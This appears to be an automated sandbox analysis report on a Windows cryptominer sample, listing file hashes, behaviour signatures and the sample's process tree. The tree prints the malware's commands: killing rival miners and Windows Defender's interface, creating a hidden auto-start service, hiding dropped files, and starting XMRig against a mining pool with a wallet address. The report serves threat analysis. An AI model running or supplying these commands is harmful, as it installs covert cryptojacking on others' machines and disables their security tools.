Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20-05-2024 10:26

General

  • Target

    5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

  • Size

    1.3MB

  • MD5

    5e960ba61a82c5340650e2ce975bb4c9

  • SHA1

    300aced1503b54d91e5508f0a210330e91b71b8a

  • SHA256

    1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3

  • SHA512

    9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1

  • SSDEEP

    24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O

Malware Config

Signatures

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Creates new service(s) 2 TTPs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to hide the file from Explorer and similar tools.

  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops file in Windows directory 16 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utility used to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 15 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4320
      • C:\Windows\SysWOW64\sc.exe
        sc delete Systemss
        3⤵
        • Launches sc.exe
        PID:940
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIserver
        3⤵
        • Launches sc.exe
        PID:1352
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIservers
        3⤵
        • Launches sc.exe
        PID:1280
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMI
        3⤵
        • Launches sc.exe
        PID:2540
      • C:\Windows\SysWOW64\sc.exe
        sc delete Serv
        3⤵
        • Launches sc.exe
        PID:3560
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_update
        3⤵
        • Launches sc.exe
        PID:3224
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_updatea
        3⤵
        • Launches sc.exe
        PID:3944
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im spoolsvs.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4896
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4552
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im NsCpuapl.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4792
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im MSASCui.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2268
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nheqminer_zcash.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3844
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nssm.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4588
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im update.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:544
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im server.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4284
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sppscv.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:628
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4376
      • C:\Windows\SysWOW64\net.exe
        net stop wkde
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4508
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop wkde
          4⤵
            PID:4144
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:1236
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im mscorsvw.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3220
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im WUDFHost.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1924
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im nheqminer.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4744
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im NsCpuCNMiner32.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2224
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im NsCpuCNMiner64.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4748
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:3100
        • C:\Windows\SysWOW64\sc.exe
          sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
          3⤵
          • Launches sc.exe
          PID:1040
        • C:\Windows\SysWOW64\net.exe
          net start wkde
          3⤵
            PID:1376
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start wkde
              4⤵
                PID:4540
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:3944
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:1284
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:4164
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:3616
        • C:\WINDOWS\Debug\wkde\mscorsvw.exe
          C:\WINDOWS\Debug\wkde\mscorsvw.exe
          1⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:1648
          • C:\WINDOWS\Debug\wkde\svchost.exe
            C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4040

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\WINDOWS\Debug\wkde\mscorsvw.ini

          Filesize

          397B

          MD5

          d298cd48c88433017ef4e66af740830e

          SHA1

          e0ef455dc4df16948d85c5a058d0980ce5020822

          SHA256

          b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89

          SHA512

          5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

        • C:\WINDOWS\Debug\wkde\mscorsvw.log

          Filesize

          244B

          MD5

          0a98d172405546d83c748505a590f268

          SHA1

          0a107d99277cc976260d59d60ea2e513a5280688

          SHA256

          cb4075e76b795f5a464a50114628b2d62e3546aa9735a0ebffef29b3e94bdcac

          SHA512

          89c091858c44cd0055a33de6fd89b20f0735bdb071f03158b76ae312af8901827f3fd26c3c7f12cfe777e42f1d4f7874da30770b3ebcb4fadd79543d100af0ef

        • C:\WINDOWS\Debug\wkde\wk.bat

          Filesize

          884B

          MD5

          816d97b2dca2af96209ef913291d59be

          SHA1

          a3c480a7e333a1623e7cd8194d68468397c3f6d1

          SHA256

          ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d

          SHA512

          54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

        • C:\Windows\debug\wkde\mscorsvw.exe

          Filesize

          684KB

          MD5

          cbb4ca806e69a4880dd02e04e5bce18b

          SHA1

          1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7

          SHA256

          2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b

          SHA512

          6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

        • C:\Windows\debug\wkde\svchost.exe

          Filesize

          687KB

          MD5

          79a1ec8d32e8e3032b5f5126c11f2216

          SHA1

          86dc55fcdc358a5c6699c41582b66b75bedc4086

          SHA256

          d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8

          SHA512

          a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

        • memory/1648-26-0x0000000000400000-0x000000000055E000-memory.dmp

          Filesize

          1.4MB

        • memory/1648-13-0x0000000000400000-0x000000000055E000-memory.dmp

          Filesize

          1.4MB

        • memory/1648-14-0x0000000000400000-0x000000000055E000-memory.dmp

          Filesize

          1.4MB

        • memory/4040-27-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-25-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-24-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-28-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-29-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-30-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-31-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-32-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-33-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-34-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-35-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-36-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-37-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB